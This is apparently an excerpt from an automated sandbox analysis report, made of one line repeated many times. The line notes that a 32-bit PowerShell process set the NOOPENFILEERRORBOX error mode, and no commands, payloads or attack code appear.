            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
